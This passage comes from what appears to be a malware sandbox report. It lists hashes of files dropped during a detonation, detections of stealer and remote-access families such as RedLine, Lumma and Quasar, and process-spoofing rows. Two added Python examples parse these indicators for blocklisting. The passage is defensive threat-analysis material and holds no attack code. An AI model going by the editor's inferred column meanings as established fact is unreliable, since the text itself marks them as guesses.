SHA512 707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

MD5 015a5ef479c8d3e296e6a99e0fa7df6a
SHA1 69f188973fdc12d282e490041d18b01c0d49752d
SHA256 c73ff8630476795ba4dde19e7763d1aae50978b0b9b029cd71828a2da3c2197c
SHA512 4c692aaff1607cf402ed7acc2f91f587229bfface6f75ae8329e031d69437f43291b186e9ca4bcdea595145ea50f3e23d064306e9a8d83a8848cf9096146e46a

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

MD5 0a3457f3fb0d5c837200b2849e85b206
SHA1 851c4add14eabb3b549666d2494ddcc4ebaf40b9
SHA256 aaeb0f22d9625f23135bc86f9ed7d5a877153732b9f24d3e416fe9fc7e532080
SHA512 9610c9e53770f451b9d686d39b4475fed85ef443db663d1a4945aca19f940a9f24cda9907fabecb27304e5b4f52c8b13cf00d8385e55a1edbb3eebaf78ab7cbd

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

MD5 e9fb13875b744fa633d1a7a34b0f6a52
SHA1 f0966985745541ba01800aa213509a89a7fdf716
SHA256 fb8fb89b5f56ce2acd9668021a470a18b7898808750800861151e908d5b1a20e
SHA512 c2feda22e23fda47f0b0ede38f5f432a656a5e7598c7a9d3d4e8babf9ff94189b69f4f4a3894c094260c3b72d21888720f60ed7ee2c018c8aced9d754e03e292

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 f25e48e1d9e1e1398bc5fbc6885570b8
SHA1 46557c8ebb9236af6c28c9bdd317d1d25749e710
SHA256 0379e6a5dff30a991e0acdb9932cac828eb3e30ca8cc23447a2bc73ae78181db
SHA512 41e61480f5141b6950d7b96f3e4dfcca19bc480e0b11eeebdedaeb266c6e525f41f3d29a3c1c0bf8f17a3c30111d8fba7e269d5fcf84b336bee916e21881acb7

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 2e02c8ed2cf16bca0c1a18665f069550
SHA1 1d1a4c7059a878b9196e7858297062753c75e5eb
SHA256 81c204b50db0c74c5040725788cec813370dd02f521b11e6a5123ff96f483b0f
SHA512 2cf38caa59b08a837d7bd287f0ec22f6c166a8269d004eb59f5bb7de0e2ed0fd6b31df7b6224d27ac79fc8720f10a1c7697b8aa62acd88138e0ab977baf6a97b

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 9196412195f67035846651ed3580203d
SHA1 5536bf9a7d266630738cf482bd4884e1cc4e11ae
SHA256 e36d96315296eea3d5e19cce81537002d313a57899efc21a6a9e71dedd07ec14
SHA512 339ef42bb92c5e2a0f3e91e326a6d57b397f513bddda4d07a334a20bbf8fcbff132005c12d5e596ea020f571a90d52522035bfa028aa7e1311dddbf89c4117fe

C:\Users\Admin\AppData\Local\Temp\gcapi.dll

MD5 1ce7d5a1566c8c449d0f6772a8c27900
SHA1 60854185f6338e1bfc7497fd41aa44c5c00d8f85
SHA256 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf
SHA512 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

MD5 ab3f75f41982ca216badc3e56f9d3e88
SHA1 ee26477ee9d90af2e940e6f99617e7d54b241635
SHA256 e47e8c01326ac9c785f3edcd04fb360333a5904854c69d464f8321a27f5d0c08
SHA512 6325f73f6d82424aaa64132fb37b0c7713fc53faa304da8d63a71c757cfd4dcdccac925650bf763188d913c9562e37f2a500ad7bb80d7b9f6aa456c43bfe8822

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

MD5 0c1a360f7ca0e6289d8403f1ebfa4690
SHA1 891483904f22cf6495bd310c4bf7c05fc42b85ba
SHA256 2d1a3f0c2f05f3d0ee2c4c4d49abd370b0a9e9c811a98c07f8d06c368d46dffe
SHA512 f10cd6843b457e1abb0b43ec716c23e8a093dd46750ea1f378e90108f28fa6c7a02d1b9227b7b9dcf9d2e8de6489cf9f6d1d24381d2aea55e6b9dd3fba55a118

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

MD5 c566295ef2f48b51a4932af0aa993e48
SHA1 0b69f71e7f624a8b5f4b502fde9de972a94543ff
SHA256 f096fd252e752b20a37c8963bb0ef947e7a7a1794552db8b5642523db9357d8f
SHA512 d51b8893ce58395dbd03441e59ca367d94a346e4241925db84b88f57209c98ebdc1513942606a4e469bf622968a10f03ce7b10f314d0ddc061675d46f34c8a3c

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

MD5 3f44dd7f287da4a9a1be82e5178b7dc8
SHA1 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9
SHA256 e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225
SHA512 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

MD5 d25c3bd6c96b1d4b95f492a9daa4a6a1
SHA1 9b4f388fec4511ce3fa5bf855626c7c7b517ac21
SHA256 fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9
SHA512 75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

MD5 2ca5f321b0683c4cdd64c2ab7761c2db
SHA1 1af4717e30ee791aa16c88f5d319bc949bdec2d5
SHA256 b19d81651cf60b9a4344f531832e7421a38ab29eaa3946de230ca72e849aa4e4
SHA512 a3f75cf31b96f480ada63a1550fbfad92daf14944e32d142afe35494058f07ce846224aef47dea7ce9da45be5e2008b0b4650e0e12d207842e83b0c6d9be89ff

C:\ProgramData\AnyDesk\system.conf

MD5 25e71767a94343d45dd3e066c05784bf
SHA1 901ae90156458e9b91f29cb0789964a5bfbc1127
SHA256 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525
SHA512 ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6

C:\ProgramData\AnyDesk\system.conf

MD5 4f559d9257cbacf85aaeb62f530c70cd
SHA1 23c369aeb9a8f6e8c036291a159bfa94b7595f91
SHA256 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598
SHA512 5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

MD5 8b712dbac428c4107c3c44f92743d8e6
SHA1 65027334951d9be6149627fef6a45f2397cfe747
SHA256 fd1eb7d83a9f704ba4f4ebea145dca07de27d78d622c24b506c9fd0f7dc090f3
SHA512 e162e242fff25aaa8192ce69a5749fa2f6919a3413c158f40b4eb383a24088c7aa321b3286d97723a960a3e9406db8747d752725f981e9c903bada8f1524d22e

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

MD5 ac1997ffe0c45d75cec0f1bbfe24cd62
SHA1 67f28f8d9ff0a2f3a6d84948f541b204339a26e4
SHA256 63424ba4e2e4c05fd5f7592d93d611a426c2bfb80f9989ecfd6b34613004614a
SHA512 527856bfb0c7cdd390dd4e868ca9137b27cd1c46c4450f061db7e1d9483403e96dbad56127fb8b186b8a3f3a5b363036e0809e9de8a9973fd89d3a79c1d52144

C:\ProgramData\AnyDesk\system.conf

MD5 97d9059805b59a38cef6036e01ac9056
SHA1 40429fc8a0d83c6f06f35597e86cc27ef34e1603
SHA256 4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc
SHA512 eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

MD5 6304ce36f17952d70bceb540d4b916ac
SHA1 737d2ecf8f514e85c2776416100eefb5ea23391c
SHA256 6b0bd6af17d546a941450c6463e3c704810b78910a6f6b31feca4e8a4200db78
SHA512 60674f266829fd74b8d15867193ebbbed77633fe89eee3824ab15d9bc563e684e4f1b3bd2ac34b03d527554f6a4bce7a16fe27c48e06ad5c0e25e3a7e9c8c78e

C:\ProgramData\AnyDesk\system.conf

MD5 9ed325d16cb0cc6ed0fefcee06aa47fc
SHA1 2aaf3518835629d1a47adba5c4d73a85b5d4e946
SHA256 2230585d83a7229c5a871f52ea78b7f4ca6b5c71be3144178a1dfe86a38f2ba6
SHA512 74b2292d029421482901d43d708605073fd1125c052ca3840ab94e1eed7a8f2f7b15364393713514cd7c0bf2a62974e15628e8769b28b534e3a62e8f4e08a289

C:\ProgramData\AnyDesk\system.conf

MD5 b09fc5d84a35b6d89c4996da86fd5bcc
SHA1 910b6098ada9294195a8d035065e2ddc141cec00
SHA256 5666dcda1f34ceda309f7ef55b5d17b14432a2c1568c6b94bdcd9f906ce49037
SHA512 1d22c697e2d5433c2bd4b611154a796aca8bfd778e3ed258db54dc040567e183c51ba5599a3f496d16db63c32769a29145e80784201b6d9fe2421ace5a8fb202

C:\ProgramData\AnyDesk\system.conf

MD5 4d425394019a7614e471dbcdb2eab3ca
SHA1 394b99f56f9824d1bba9fae3e48b6318c2782da8
SHA256 74e9fa94a7466325ee78dccea7fb8bc0893aaa596be54f11a7cd0672d43d2369
SHA512 4d4f2de83b7adcf7c604b2bdea21b00cb30b00e01b9239808f60f3fcb0181df968fd890b6ca38ccb92b8174119d192585409576cf3f70556d74009e5c0eabe05

C:\ProgramData\AnyDesk\system.conf

MD5 8cd44194d707538c7dcdaf49553022bd
SHA1 7cb12f6d48e6567da3c9ae5277a9202555557629
SHA256 736e6d57d96e6226d335fec4cca66fd0b8da17c97b45825f716d01daf418c4b3
SHA512 8953b6cb205d5c92251092ba03c7c13de6118817de9ca90ea1e7e55219d60cdc5d581f76d9f74394f22f5f693933888ee48aa705c8731151dc8f88efa1f51e22

C:\ProgramData\AnyDesk\system.conf

MD5 18596c9502648d76dbd740afb216b780
SHA1 e34c218a9b6092a3f02dd673368c559d0c34d2bb
SHA256 da12f373fbbe5d70cc4910e11575a7d8a700eb74c2918355deb3782b22cbe75f
SHA512 bbfccce590a6c8ff6cdb41b4611b3db5993df470631fa3b50114260a94492f7fb82c15268a11f3b59f1cc05137415bfa32c9d4015a5bdf372d70c9de0fd95e25

C:\ProgramData\AnyDesk\system.conf

MD5 cb6fbf8cbc54e6a02a22c2bdd7aba4d2
SHA1 c607c1c2139b76ef4d821c97bf572458f50af1ba
SHA256 a3fe78f093eb4f873dc4dc54c38ce3edc32d6c71311da788ad35f34568247944
SHA512 a32017c99f3ce240e58e9f98e637a7e816636569f9307fad361feb2e17a22236888270223644aa1e4cb695a361ef94666b86be7c9f059a7273faf14fff5e96c4

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

MD5 8e0d340e723ce188de651b8ffb887d81
SHA1 cb90a07f1a4ffae68cca6281325606009d3d7266
SHA256 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7
SHA512 d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1

C:\ProgramData\AnyDesk\system.conf

MD5 7ca60496f49b36a55f754ef4e4d796f9
SHA1 e672b9606b4b99b5849b848773c62ce39a0d7446
SHA256 1ea32702f54098c48e469e90a4fdb50c71a7585d76b6f7f72e52b94f667e6a12
SHA512 80cf061f3a88a9964d09ce6395a2857ad1ed1b1611ac6eaef4a95ca1f2ed2580142a041276407fc80e670dad3fd6846e29363cd33d27c67f852cb9a9bcc8cbb1

C:\ProgramData\AnyDesk\system.conf

MD5 f87f3d5de6100718cf2389fcfe5014f6
SHA1 63c292cd701507e3d33a97367d88c56915d45a54
SHA256 5305f4c6adf2d2f367a57cc28d6599b6d0949ec913e742b6ca7c815cf7ff225a
SHA512 bef4476ba269b636c76c38e2a515eb3bffc28ea21cd4e97b1b9a15d57d7f125e394c5b92fd57c1310277438071c4d38bea255445a7605db6a364cf7f3a9f6368

C:\ProgramData\AnyDesk\system.conf

MD5 5f1cc8b91f1fa3f7bf05c943f9bfa405
SHA1 3b67d5f9675883764067d9ce27c451f2b410fbd3
SHA256 f04e6e10b5b459c460d9e9cdc7ee46c2db88521eacfd9ca4a5aa978fce4373e4
SHA512 b7e967c6863b54414984e557a63df26c79514e624e1aba33879f870f5ea6257e35676db6fdc6e700162829de2a90076bb0607d0475e9aa2480e0358b56df1dcc

C:\ProgramData\AnyDesk\system.conf

MD5 9fe4a19e60afbd686376ed11561c60e4
SHA1 465b36378d99f68d150051f74b97f4d40a058edf
SHA256 54c8b81ba485c73c4eef155a429dbbdf7ee13f5e29552cb6c7827c50c64383a3
SHA512 83b96f9b49f4dd56d4136cce2c9511a742dab0ef8b84886fe8381e4d80c47ed2636e5dad829e7c345ffe794870404280895618e7153ae52a0346dca1447a1ada

C:\ProgramData\AnyDesk\system.conf

MD5 68617799427118e67ca7e8e32534d5e2
SHA1 bb48fdc70d6f85bbcf0d6df8ec1fe884b909d732
SHA256 a172eca9aa1203f313aa2260a55370b8f66163e2ab6ccffa5eccf37163464aa5
SHA512 f4e5711e28410bd5f8f44246b208091d642f4bb22233df5b639acde0b3fe290b2d171f4a62dd6540b6dde3abf9b427ebd562c241a5c8854b27417d16aa25bafc

C:\ProgramData\AnyDesk\system.conf

MD5 3a2be1963f060dc0a503bb41cca11d5b
SHA1 9658c4c1394ce01257d94b1f871459477f254f01
SHA256 e54b0d0762b2ec007d6cd730949105af6c1afac4988b336649d3a30230e17295
SHA512 9b2d0f5f3468ebc08bcd0388a3916bf8204e20b3f209e66c8c688fdb28d951701dc9442aa9f9a4ee0a7c963c5d4c2004f32ebadc0d958f38f9ba4c264d092a47

C:\ProgramData\AnyDesk\service.conf

MD5 39447b6c4901c5bf75fd4c451dcaa6f5
SHA1 93cb272e7da05795bcb13589c787952861176699
SHA256 618bd9a73875072a768992de3fab5b12bd64c0b6d14321f13e7a4760b556f734
SHA512 5aa990f2492b78ec8d154329b3de8503448081f4062b34f748a43d99774460dfe1f9ee76ee91a52ff7b3451495149d90d57ce205edbcc4f5a4ab5f077bbb349b

C:\ProgramData\AnyDesk\service.conf

MD5 3d98c6ff7e60e0498d815cb2dfb6f486
SHA1 f9844db3a2aebb4925443e6a6855adb660329e23
SHA256 c917d55804468ad523497c2cff0f4faaf930afbd1ffca82a768c0e9dd1239f8b
SHA512 e8727674c1b528d2d3edc7ad4e8c3f01c7becb8f6a24cc606865a432fc2a049facb9b3bf228d8d4ca4a49361853b07e1d33e3de2c3b8d92a9e9d6bf053cdf20e

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

MD5 2d0600fe2b1b3bdc45d833ca32a37fdb
SHA1 e9a7411bfef54050de3b485833556f84cabd6e41
SHA256 effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696
SHA512 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703

C:\Users\Admin\AppData\Local\Temp\ ‍ ‎    ‎ \Common Files\Desktop\PingDisconnect.docx

MD5 157d2cbfd55615fe5ca2b0ae21b066a9
SHA1 825856657c8711e9fb4c26db49e234cc24c23509
SHA256 c239c0c41f3a5919581dc83c9bbce497fa0979ed88ab8c1543393da2a3e5ee41
SHA512 14a0dfc952473cbed5e9f856664e3a01e9847d9c90078e29fa001ceeb8a1d641c3f69291955e78962e8fdf525be270814509d83e07df87dc8894130594ab4651

C:\Users\Admin\AppData\Local\Temp\ ‍ ‎    ‎ \Common Files\Desktop\DebugDisable.xlsx

MD5 0d2a1fc5449e8722a23d559eb3ab35fc
SHA1 b6b784ff9157a34892d2415861d53f34e797f8ed
SHA256 22b67a562208e10e3b61e1799f50c2a620e3c7ea8f5bcb4022b1bb926b2a60fe
SHA512 2c818df5ac648778fcc3022c310daed07d2cc93c26bf4c53b076bf5826773d9d5f421c55c1b9d92a1915fb8e9061d4a31eb702859c520880e25c32fafc640bca

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

MD5 ff7e78da9c8e580229fe95dfdfe5b098
SHA1 ab968e47e463f29426116753b0ca086fd5b33cdb
SHA256 cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d
SHA512 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

MD5 d6b16370cd4e60185aa88607316a0c05
SHA1 7fbc63b1203617c67e5491745beaedb424baed78
SHA256 a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2
SHA512 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906

C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe

MD5 12d7ae10b1836cd3091d712723a5a4d6
SHA1 b99fef462f433da1b959c69dfe62703d12464ea7
SHA256 8c56614bca1aaaabe522c46bb14ad9237a9d80783725b729feb4b255c8aca445
SHA512 ab3dd7772ff74a3b48033be5011edc065425e225c5c1c489cd28c6791bd24fc14be01105b97e14dee6ed4b5f453a986048d1a91808619dad518c43065ebc699a

C:\ProgramData\AnyDesk\system.conf

MD5 e437ee3038b3131ac7530b7297d6c680
SHA1 40313dee0933ece473782392e1e6b135a98ffaae
SHA256 a0bb637575c3101133977bad99d853e8c23b7f63f7ad05b4a03e2ac26a220a68
SHA512 8b0db6a42d77d01a1a1c8f584feb59cbc1c776c4cca87cedbc94887892ae569155199c3db344fdb2075e7bf4302fcfdaf9511efca6aa77204607bc1aecf5dd18

C:\ProgramData\AnyDesk\system.conf

MD5 a56ea93ad882910cf87db920b65c691c
SHA1 0b7140fb8ad96c300949dc0c9adc5d6270a2d586
SHA256 9a0c1d4188aa276a71668cdced886a6d8ccf36c6dab65540c2be03513ee91998
SHA512 f1a751cb409ca8f65685eb5edeaa329eb4d42e175625307265d5f43eea04c68a072f0a0228abaff08fb4f471cbfa730b3310dc71124f74c6adb9111d9c2f6758

C:\ProgramData\AnyDesk\service.conf

MD5 8a3ee5e9ae7cefdb20d13a8a5bea198a
SHA1 2a3fe3f4253f73118faeba5940487df2434e3a96
SHA256 a0749b90ce94a1fa159d034860dc3793f6b08d93bbd1dd94933fc8129a4c602a
SHA512 2c7e84d64ba0237a2e7afaa93834da585fde62c290b9518dc6b957c46b838ee8f73a398318cec9ea7551dea78857898816e94ef31a09e8cb1da4403b92e5cca9
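The dropped-file listing above is the raw IOC material of this detonation, but it is only useful once it is parsed: digests need to be length-checked before they go into a blocklist, the many rewrites of C:\ProgramData\AnyDesk\system.conf need to be recognised as one file that keeps changing rather than as dozens of distinct indicators, and the dropped binaries need to be separated from config and document artifacts. The following Python is an added example by the editor, not code from the report or from the sandbox vendor. The record layout (a path line, then MD5/SHA1/SHA256/SHA512 lines, blank-line separated) is read off the page and is an assumption about the format; SAMPLE is a constructed four-entry excerpt of the list above with the SHA512 lines left out for brevity (the parser accepts them as well).

```python
"""Turn a sandbox dropped-file listing into IOC records.

Added example, not part of the original report. The record layout is inferred
from the page; SAMPLE is a constructed excerpt of four entries from the listing.
"""
import re
from collections import defaultdict

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

MD5 78c586522f986994aa77c466c9d678a8
SHA1 4b9b13c3782ae532a140a33ba673dc65a37aa882
SHA256 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9

C:\ProgramData\AnyDesk\system.conf

MD5 25e71767a94343d45dd3e066c05784bf
SHA1 901ae90156458e9b91f29cb0789964a5bfbc1127
SHA256 1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525

C:\ProgramData\AnyDesk\system.conf

MD5 4f559d9257cbacf85aaeb62f530c70cd
SHA1 23c369aeb9a8f6e8c036291a159bfa94b7595f91
SHA256 863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598

C:\Windows\SysWOW64\directx\websetup\dsetup.dll

MD5 984cad22fa542a08c5d22941b888d8dc
SHA1 3e3522e7f3af329f2235b0f0850d664d5377b3cd
SHA256 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308
"""


def parse_dropped_files(text):
    """Return (records, orphan_hash_lines).

    A line containing a path separator starts a new record; hash lines attach to
    the most recent record; any other non-empty line (a heading) closes it.
    Digests with the wrong length for their algorithm are listed under
    record["invalid"] instead of being kept, so a mis-extracted hash never ends
    up in a blocklist. Hash lines seen before any path (a record cut off above
    the excerpt) are counted as orphans.
    """
    records, current, orphans = [], None, 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m is None:
            if "\\" in line or "/" in line:
                current = {"path": line, "invalid": []}
                records.append(current)
            else:
                current = None
            continue
        if current is None:
            orphans += 1
            continue
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) == HASH_LEN[algo]:
            current[algo] = digest
        else:
            current["invalid"].append(algo)
    return records, orphans


def rewritten_paths(records):
    """Paths written more than once with different content, e.g. a config file
    the sample keeps regenerating. Returns {path: number of distinct SHA256}."""
    seen = defaultdict(set)
    for r in records:
        if "SHA256" in r:
            seen[r["path"]].add(r["SHA256"])
    return {p: len(h) for p, h in seen.items() if len(h) > 1}


def binary_hashes(records, exts=(".exe", ".dll", ".sys", ".scr")):
    """SHA256 values of dropped executables, the subset worth blocklisting."""
    return {r["SHA256"] for r in records
            if "SHA256" in r and r["path"].lower().endswith(exts)}


if __name__ == "__main__":
    recs, orphan_count = parse_dropped_files(SAMPLE)
    print(len(recs), "records,", orphan_count, "orphan hash lines")
    print("rewritten:", rewritten_paths(recs))
    print("binaries:", sorted(binary_hashes(recs)))
```

Run against the full listing, rewritten_paths is what separates the AnyDesk configuration churn (one path, many digests, none of them a useful IOC) from genuinely distinct drops, and binary_hashes gives the set that belongs in a blocklist.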

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

201s

Max time network

300s

Command Line

winlogon.exe

Signatures

44Caliber

stealer 44caliber

44Caliber family

44caliber

Detect Umbral payload

2 hits (description, indicator, process and target all N/A)

Detect Xworm Payload

9 hits (description, indicator, process and target all N/A)

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

4 hits (description, indicator, process and target all N/A)

RMS

trojan rat rms

RedLine

infostealer redline

RedLine payload

1 hit (description, indicator, process and target all N/A)

Redline family

redline

Rms family

rms

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5040 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe C:\Windows\Explorer.EXE
PID 6000 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 816 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 3020 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5476 created 5772 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
PID 5476 created 1920 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
PID 5476 created 4892 N/A C:\Windows\System32\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5476 created 4280 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\888.exe
PID 5476 created 4016 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5476 created 4548 N/A C:\Windows\System32\svchost.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4464 created 6008 N/A C:\Windows\system32\svchost.exe C:\Windows\SysWOW64\ruts\rutserv.exe
PID 5476 created 4388 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
PID 5476 created 6052 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
PID 5476 created 5516 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
PID 5476 created 4016 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5476 created 2976 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
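The rows above mix two very different things under one signature, and they are worth separating before anyone chases the svchost.exe entries. What follows is an added example by the editor, not code from the report or its vendor. The column reading, PID <creator> created <parent PID> with the creator's image in the Process column and the designated parent's image in the Target column, is inferred from the rows themselves: 3436 and 4016 (both explorer) recur as the second PID, so they cannot be freshly created child PIDs. The classification rules are the editor's own, not the sandbox's: a System32 svchost.exe creating processes under other parents is how the AppInfo service launches UAC-elevated processes (the requesting process becomes the parent), so those rows say "the target obtained elevation" rather than "the malware spoofed its parent"; a creator in a user-writable directory choosing its own parent is classic PPID spoofing; and anything parented onto winlogon.exe or another privileged system process deserves a look regardless of who created it. SAMPLE_ROWS is copied from the table above.

```python
"""Classify the "PID <creator> created <parent>" rows of the
NtCreateUserProcessOtherParentProcess signature.

Added example, not part of the original report. Column meaning is inferred
from the rows; the classification rules are the editor's own.
"""
import re
from collections import defaultdict

ROW_RE = re.compile(
    r"^PID (?P<creator_pid>\d+) created (?P<parent_pid>\d+) (?P<indicator>\S+) "
    r"(?P<creator_image>.+?) (?P<parent_image>[A-Za-z]:\\.*)$"
)

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\programdata\\", "\\users\\public\\")
PRIVILEGED = ("\\winlogon.exe", "\\lsass.exe", "\\services.exe",
              "\\csrss.exe", "\\wininit.exe")

SAMPLE_ROWS = r"""
PID 5040 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe C:\Windows\Explorer.EXE
PID 6000 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 816 created 3436 N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Windows\Explorer.EXE
PID 3020 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5476 created 5772 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
PID 5476 created 1920 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
PID 5476 created 4892 N/A C:\Windows\System32\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5476 created 4280 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\888.exe
PID 5476 created 4016 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5476 created 4548 N/A C:\Windows\System32\svchost.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4464 created 6008 N/A C:\Windows\system32\svchost.exe C:\Windows\SysWOW64\ruts\rutserv.exe
PID 5476 created 4388 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
PID 5476 created 6052 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
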